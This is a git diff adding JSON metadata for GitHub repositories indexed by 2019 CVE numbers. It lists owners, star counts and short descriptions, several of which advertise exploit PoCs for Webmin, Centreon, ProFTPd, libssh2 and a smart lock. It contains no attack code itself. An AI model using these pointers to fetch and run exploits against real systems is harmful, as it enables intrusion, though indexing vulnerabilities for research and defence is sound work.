0000000000..ebbdb51711 --- /dev/null +++ b/2019/CVE-2019-12796.json @@ -0,0 +1,33 @@ +[ + { + "id": 192375622, + "name": "CVE-2019-12796", + "full_name": "PeterUpfold\/CVE-2019-12796", + "owner": { + "login": "PeterUpfold", + "id": 1255375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1255375?v=4", + "html_url": "https:\/\/github.com\/PeterUpfold", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterUpfold\/CVE-2019-12796", + "description": "This repository will contain information regarding CVE-2019-12796 once it is made public.", + "fork": false, + "created_at": "2019-06-17T15:47:12Z", + "updated_at": "2024-08-12T19:50:09Z", + "pushed_at": "2019-06-17T15:49:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12814.json b/2019/CVE-2019-12814.json new file mode 100644 index 0000000000..d324d7bdc6 --- /dev/null +++ b/2019/CVE-2019-12814.json @@ -0,0 +1,37 @@ +[ + { + "id": 266469917, + "name": "CVE-2019-12814", + "full_name": "Al1ex\/CVE-2019-12814", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2019-12814", + "description": "CVE-2019-12814:Jackson JDOM XSLTransformer Gadget", + "fork": false, + "created_at": "2020-05-24T04:33:55Z", + "updated_at": "2024-08-12T20:01:49Z", + "pushed_at": "2022-11-16T12:14:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-12814", + "jackson", + "rce" + ], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12815.json b/2019/CVE-2019-12815.json new file mode 100644 index 0000000000..52a3e372ba --- /dev/null +++ b/2019/CVE-2019-12815.json @@ -0,0 +1,64 @@ +[ + { + "id": 199214840, + "name": "CVE-2019-12815", + "full_name": "KTN1990\/CVE-2019-12815", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2019-12815", + "description": "ProFTPd mod_copy - arbitrary file copy without authentication", + "fork": false, + "created_at": "2019-07-27T21:26:06Z", + "updated_at": "2024-08-12T19:51:26Z", + "pushed_at": "2019-09-24T02:06:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 290230078, + "name": "proftpd-cve-2019-12815", + "full_name": "lcartey\/proftpd-cve-2019-12815", + "owner": { + "login": "lcartey", + "id": 5377966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5377966?v=4", + "html_url": "https:\/\/github.com\/lcartey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lcartey\/proftpd-cve-2019-12815", + "description": null, + "fork": false, + "created_at": "2020-08-25T13:58:38Z", + "updated_at": "2020-08-25T14:13:27Z", + "pushed_at": "2020-08-25T14:05:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12836.json b/2019/CVE-2019-12836.json new file mode 100644 index 0000000000..b96da8d782 --- /dev/null +++ b/2019/CVE-2019-12836.json @@ -0,0 +1,33 @@ +[ + { + "id": 192150805, + "name": "CVE-2019-12836", + "full_name": "9lyph\/CVE-2019-12836", + "owner": { + "login": "9lyph", + "id": 44860700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44860700?v=4", + "html_url": "https:\/\/github.com\/9lyph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9lyph\/CVE-2019-12836", + "description": "CVE-2019-12836", + "fork": false, + "created_at": "2019-06-16T04:41:29Z", + "updated_at": "2024-10-03T12:00:25Z", + "pushed_at": "2024-10-03T12:00:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12840.json b/2019/CVE-2019-12840.json new file mode 100644 index 0000000000..8d315ec65b --- /dev/null +++ b/2019/CVE-2019-12840.json @@ -0,0 +1,190 @@ +[ + { + "id": 219832922, + "name": "CVE-2019-12840_POC", + "full_name": "bkaraceylan\/CVE-2019-12840_POC", + "owner": { + "login": "bkaraceylan", + "id": 22098635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22098635?v=4", + "html_url": "https:\/\/github.com\/bkaraceylan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bkaraceylan\/CVE-2019-12840_POC", + "description": "PoC for Webmin Package Update Authenticated Remote Command Execution", + "fork": false, + "created_at": "2019-11-05T19:22:45Z", + "updated_at": "2024-08-12T19:54:35Z", + "pushed_at": "2019-11-05T19:27:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 220680650, + "name": "webmin_cve-2019-12840_poc", + "full_name": "KrE80r\/webmin_cve-2019-12840_poc", + "owner": { + "login": "KrE80r", + "id": 13027962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13027962?v=4", + "html_url": "https:\/\/github.com\/KrE80r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KrE80r\/webmin_cve-2019-12840_poc", + "description": "A standalone POC for CVE-2019-12840", + "fork": false, + "created_at": "2019-11-09T17:48:39Z", + "updated_at": "2024-08-12T19:54:41Z", + "pushed_at": "2019-11-10T13:26:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 323973616, + "name": "webminscan", + "full_name": "anasbousselham\/webminscan", + "owner": { + "login": "anasbousselham", + "id": 9357948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9357948?v=4", + "html_url": "https:\/\/github.com\/anasbousselham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anasbousselham\/webminscan", + "description": "Webmin Exploit Scanner CVE-2020-35606 CVE-2019-12840", + "fork": false, + "created_at": "2020-12-23T18:22:36Z", + "updated_at": "2020-12-23T18:23:02Z", + "pushed_at": "2020-12-23T18:22:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 353086761, + "name": "CVE-2019-12840", + "full_name": "zAbuQasem\/CVE-2019-12840", + "owner": { + "login": "zAbuQasem", + "id": 74984708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74984708?v=4", + "html_url": "https:\/\/github.com\/zAbuQasem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zAbuQasem\/CVE-2019-12840", + "description": "CVE-2019-12840", + "fork": false, + "created_at": "2021-03-30T17:32:30Z", + "updated_at": "2024-08-12T20:11:41Z", + "pushed_at": "2021-09-19T20:39:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 413929777, + "name": "CVE-2019-12840.py", + "full_name": "WizzzStark\/CVE-2019-12840.py", + "owner": { + "login": "WizzzStark", + "id": 85120579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85120579?v=4", + "html_url": "https:\/\/github.com\/WizzzStark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WizzzStark\/CVE-2019-12840.py", + "description": "POC: CVE-2019-12840 (Authenticated RCE - Webmin Package Updates)", + "fork": false, + "created_at": "2021-10-05T18:10:05Z", + "updated_at": "2021-10-05T18:12:21Z", + "pushed_at": "2021-10-05T18:12:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748414452, + "name": "PoC-CVE-2019-12840", + "full_name": "Pol-Ruiz\/PoC-CVE-2019-12840", + "owner": { + "login": "Pol-Ruiz", + "id": 151052652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151052652?v=4", + "html_url": "https:\/\/github.com\/Pol-Ruiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pol-Ruiz\/PoC-CVE-2019-12840", + "description": "Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2019-12840 la qual te da un RCE en root", + "fork": false, + "created_at": "2024-01-25T23:07:28Z", + "updated_at": "2024-01-25T23:26:58Z", + "pushed_at": "2024-01-25T23:27:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12889.json b/2019/CVE-2019-12889.json new file mode 100644 index 0000000000..f1149bec95 --- /dev/null +++ b/2019/CVE-2019-12889.json @@ -0,0 +1,33 @@ +[ + { + "id": 196251116, + "name": "CVE-2019-12889", + "full_name": "nulsect0r\/CVE-2019-12889", + "owner": { + "login": "nulsect0r", + "id": 52004761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52004761?v=4", + "html_url": "https:\/\/github.com\/nulsect0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nulsect0r\/CVE-2019-12889", + "description": null, + "fork": false, + "created_at": "2019-07-10T17:49:51Z", + "updated_at": "2024-08-12T19:50:55Z", + "pushed_at": "2019-08-12T15:14:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12890.json b/2019/CVE-2019-12890.json new file mode 100644 index 0000000000..9ab63a5688 --- /dev/null +++ b/2019/CVE-2019-12890.json @@ -0,0 +1,33 @@ +[ + { + "id": 221921802, + "name": "CVE-2019-12890_RedxploitHQ", + "full_name": "EthicalHCOP\/CVE-2019-12890_RedxploitHQ", + "owner": { + "login": "EthicalHCOP", + "id": 33833733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33833733?v=4", + "html_url": "https:\/\/github.com\/EthicalHCOP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EthicalHCOP\/CVE-2019-12890_RedxploitHQ", + "description": "Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework", + "fork": false, + "created_at": "2019-11-15T12:41:19Z", + "updated_at": "2024-08-12T19:54:52Z", + "pushed_at": "2019-11-15T13:02:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12937.json b/2019/CVE-2019-12937.json new file mode 100644 index 0000000000..8b8c5e543a --- /dev/null +++ b/2019/CVE-2019-12937.json @@ -0,0 +1,33 @@ +[ + { + "id": 787694555, + "name": "CVE-2019-12937-ToaruOS", + "full_name": "AkashicYiTai\/CVE-2019-12937-ToaruOS", + "owner": { + "login": "AkashicYiTai", + "id": 97335989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97335989?v=4", + "html_url": "https:\/\/github.com\/AkashicYiTai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkashicYiTai\/CVE-2019-12937-ToaruOS", + "description": null, + "fork": false, + "created_at": "2024-04-17T02:14:45Z", + "updated_at": "2024-04-17T07:51:22Z", + "pushed_at": "2024-04-17T17:06:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12949.json b/2019/CVE-2019-12949.json new file mode 100644 index 0000000000..9a656e56d8 --- /dev/null +++ b/2019/CVE-2019-12949.json @@ -0,0 +1,33 @@ +[ + { + "id": 193627360, + "name": "CVE-2019-12949", + "full_name": "tarantula-team\/CVE-2019-12949", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-12949", + "description": "CVE-2019-12949 ", + "fork": false, + "created_at": "2019-06-25T03:22:23Z", + "updated_at": "2024-08-12T19:50:24Z", + "pushed_at": "2019-06-28T04:19:38Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12999.json b/2019/CVE-2019-12999.json new file mode 100644 index 0000000000..3e15db79e1 --- /dev/null +++ b/2019/CVE-2019-12999.json @@ -0,0 +1,33 @@ +[ + { + "id": 211231317, + "name": "chanleakcheck", + "full_name": "lightninglabs\/chanleakcheck", + "owner": { + "login": "lightninglabs", + "id": 24724349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24724349?v=4", + "html_url": "https:\/\/github.com\/lightninglabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lightninglabs\/chanleakcheck", + "description": "A tool to check if your lnd node was targeted by CVE-2019-12999", + "fork": false, + "created_at": "2019-09-27T03:47:09Z", + "updated_at": "2024-08-12T19:53:24Z", + "pushed_at": "2019-09-27T21:08:41Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13000.json b/2019/CVE-2019-13000.json new file mode 100644 index 0000000000..fc94e6fc55 --- /dev/null +++ b/2019/CVE-2019-13000.json @@ -0,0 +1,33 @@ +[ + { + "id": 211268436, + "name": "detection-tool-cve-2019-13000", + "full_name": "ACINQ\/detection-tool-cve-2019-13000", + "owner": { + "login": "ACINQ", + "id": 7670721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7670721?v=4", + "html_url": "https:\/\/github.com\/ACINQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ACINQ\/detection-tool-cve-2019-13000", + "description": "A tool that detect if your node has been victim of the invalid funding tx attack.", + "fork": false, + "created_at": "2019-09-27T08:07:07Z", + "updated_at": "2024-08-12T19:53:24Z", + "pushed_at": "2019-09-27T13:44:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13024.json b/2019/CVE-2019-13024.json new file mode 100644 index 0000000000..65fe9be5d2 --- /dev/null +++ b/2019/CVE-2019-13024.json @@ -0,0 +1,64 @@ +[ + { + "id": 204202778, + "name": "CVE-2019-13024", + "full_name": "mhaskar\/CVE-2019-13024", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2019-13024", + "description": "The official exploit code for Centreon v19.04 Remote Code Execution CVE-2019-13024", + "fork": false, + "created_at": "2019-08-24T19:26:19Z", + "updated_at": "2024-08-12T19:52:19Z", + "pushed_at": "2019-08-24T19:27:24Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 220509225, + "name": "Centreon-RCE", + "full_name": "get-get-get-get\/Centreon-RCE", + "owner": { + "login": "get-get-get-get", + "id": 51015518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51015518?v=4", + "html_url": "https:\/\/github.com\/get-get-get-get", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/get-get-get-get\/Centreon-RCE", + "description": "Centreon v.19.04 Remote Code Execution exploit (CVE-2019-13024)", + "fork": false, + "created_at": "2019-11-08T16:46:13Z", + "updated_at": "2024-08-12T19:54:40Z", + "pushed_at": "2019-11-08T17:39:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13025.json b/2019/CVE-2019-13025.json new file mode 100644 index 0000000000..aface1e18f --- /dev/null +++ b/2019/CVE-2019-13025.json @@ -0,0 +1,38 @@ +[ + { + "id": 212197607, + "name": "CVE-2019-13025", + "full_name": "x1tan\/CVE-2019-13025", + "owner": { + "login": "x1tan", + "id": 5700584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5700584?v=4", + "html_url": "https:\/\/github.com\/x1tan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/x1tan\/CVE-2019-13025", + "description": "Connect Box CH7465LG (CVE-2019-13025)", + "fork": false, + "created_at": "2019-10-01T20:53:47Z", + "updated_at": "2024-08-12T19:53:34Z", + "pushed_at": "2021-06-02T21:00:50Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "connect-box", + "cve", + "remote-code-execution", + "remote-execution" + ], + "visibility": "public", + "forks": 6, + "watchers": 38, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13027.json b/2019/CVE-2019-13027.json new file mode 100644 index 0000000000..0504e895b4 --- /dev/null +++ b/2019/CVE-2019-13027.json @@ -0,0 +1,33 @@ +[ + { + "id": 195768661, + "name": "CVE-2019-13027", + "full_name": "IckoGZ\/CVE-2019-13027", + "owner": { + "login": "IckoGZ", + "id": 52542268, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52542268?v=4", + "html_url": "https:\/\/github.com\/IckoGZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IckoGZ\/CVE-2019-13027", + "description": "Details for disclosing CVE-2019-13027", + "fork": false, + "created_at": "2019-07-08T08:25:07Z", + "updated_at": "2024-08-12T19:50:50Z", + "pushed_at": "2019-07-11T08:33:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13051.json b/2019/CVE-2019-13051.json new file mode 100644 index 0000000000..c1b13b402f --- /dev/null +++ b/2019/CVE-2019-13051.json @@ -0,0 +1,33 @@ +[ + { + "id": 216841467, + "name": "CVE-2019-13051", + "full_name": "pr0tean\/CVE-2019-13051", + "owner": { + "login": "pr0tean", + "id": 52039659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52039659?v=4", + "html_url": "https:\/\/github.com\/pr0tean", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pr0tean\/CVE-2019-13051", + "description": null, + "fork": false, + "created_at": "2019-10-22T15:00:48Z", + "updated_at": "2024-08-12T19:54:08Z", + "pushed_at": "2019-10-22T15:03:34Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13063.json b/2019/CVE-2019-13063.json new file mode 100644 index 0000000000..9539c1a4ac --- /dev/null +++ b/2019/CVE-2019-13063.json @@ -0,0 +1,33 @@ +[ + { + "id": 196970646, + "name": "CVE-2019-13063-POC", + "full_name": "0x6b7966\/CVE-2019-13063-POC", + "owner": { + "login": "0x6b7966", + "id": 22814832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22814832?v=4", + "html_url": "https:\/\/github.com\/0x6b7966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x6b7966\/CVE-2019-13063-POC", + "description": "Proof of concept tool to exploit the directory traversal and local file inclusion vulnerability that resides in the Sahi-pro web application CVE-2019-13063", + "fork": false, + "created_at": "2019-07-15T09:45:36Z", + "updated_at": "2024-08-12T19:51:04Z", + "pushed_at": "2019-07-01T19:16:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13086.json b/2019/CVE-2019-13086.json new file mode 100644 index 0000000000..f29d4fa8f5 --- /dev/null +++ b/2019/CVE-2019-13086.json @@ -0,0 +1,33 @@ +[ + { + "id": 247628430, + "name": "CVE_POC_test", + "full_name": "lingchuL\/CVE_POC_test", + "owner": { + "login": "lingchuL", + "id": 51895279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51895279?v=4", + "html_url": "https:\/\/github.com\/lingchuL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lingchuL\/CVE_POC_test", + "description": "CVE-2019-13086漏洞的复现以及poc实验代码", + "fork": false, + "created_at": "2020-03-16T06:34:40Z", + "updated_at": "2024-08-12T19:58:51Z", + "pushed_at": "2020-03-16T07:10:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13101.json b/2019/CVE-2019-13101.json new file mode 100644 index 0000000000..1b26da961d --- /dev/null +++ b/2019/CVE-2019-13101.json @@ -0,0 +1,33 @@ +[ + { + "id": 202451022, + "name": "dlkploit600", + "full_name": "halencarjunior\/dlkploit600", + "owner": { + "login": "halencarjunior", + "id": 403088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/403088?v=4", + "html_url": "https:\/\/github.com\/halencarjunior", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halencarjunior\/dlkploit600", + "description": "Simple Python script for D-Link vulnerability scan and test [CVE-2019-13101]", + "fork": false, + "created_at": "2019-08-15T01:20:45Z", + "updated_at": "2024-08-12T19:52:00Z", + "pushed_at": "2019-08-15T15:17:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13115.json b/2019/CVE-2019-13115.json new file mode 100644 index 0000000000..b650b6198f --- /dev/null +++ b/2019/CVE-2019-13115.json @@ -0,0 +1,64 @@ +[ + { + "id": 212638065, + "name": "Libssh2-Exploit", + "full_name": "viz27\/Libssh2-Exploit", + "owner": { + "login": "viz27", + "id": 9962088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9962088?v=4", + "html_url": "https:\/\/github.com\/viz27", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viz27\/Libssh2-Exploit", + "description": "Create an exploit to libssh2 vulnerabulity described in CVE-2019-13115", + "fork": false, + "created_at": "2019-10-03T17:26:08Z", + "updated_at": "2021-11-02T01:00:14Z", + "pushed_at": "2020-08-17T07:05:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 212644372, + "name": "libssh2-Exploit", + "full_name": "CSSProject\/libssh2-Exploit", + "owner": { + "login": "CSSProject", + "id": 56131742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56131742?v=4", + "html_url": "https:\/\/github.com\/CSSProject", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CSSProject\/libssh2-Exploit", + "description": "Create an exploit to libssh2 vulnerabulity described in CVE-2019-13115", + "fork": false, + "created_at": "2019-10-03T17:58:03Z", + "updated_at": "2024-08-12T19:53:36Z", + "pushed_at": "2019-10-03T17:59:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13143.json b/2019/CVE-2019-13143.json new file mode 100644 index 0000000000..fd0c9701a6 --- /dev/null +++ b/2019/CVE-2019-13143.json @@ -0,0 +1,37 @@ +[ + { + "id": 200684724, + "name": "pwnfb50", + "full_name": "securelayer7\/pwnfb50", + "owner": { + "login": "securelayer7", + "id": 14994455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14994455?v=4", + "html_url": "https:\/\/github.com\/securelayer7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securelayer7\/pwnfb50", + "description": ":unlock: transfer ownership of any FB50 smart lock to yourself (CVE-2019-13143)", + "fork": false, + "created_at": "2019-08-05T15:45:02Z", + "updated_at": "2024-08-12T19:51:42Z", + "pushed_at": "2019-08-07T13:06:15Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "iot", + "smartlock" + ], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-13144.json b/2019/CVE-2019-13144.json new file mode 100644 index 0000000000..b8101fc414 --- /dev/null +++ b/2019/CVE-2019-13144.json @@ -0,0 +1,33 @@ +[ + { + "id": 209331827, + "name": "CVE-2019-13144", + "full_name": "cccaaasser\/CVE-2019-13144", + "owner": { + "login": "cccaaasser", + "id": 29791805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29791805?v=4", + "html_url": "https:\/\/github.com\/cccaaasser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cccaaasser\/CVE-2019-13144", + "description": "Vulnerability in myTinyTodo", + "fork": false, + "created_at": "2019-09-18T14:39:49Z", + "updated_at": "2022-10-06T14:11:13Z", + "pushed_at": "2019-09-18T14:44:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1315.json b/2019/CVE-2019-1315.json new file mode 100644 index 0000000000..7ad7197f21 --- /dev/null +++ 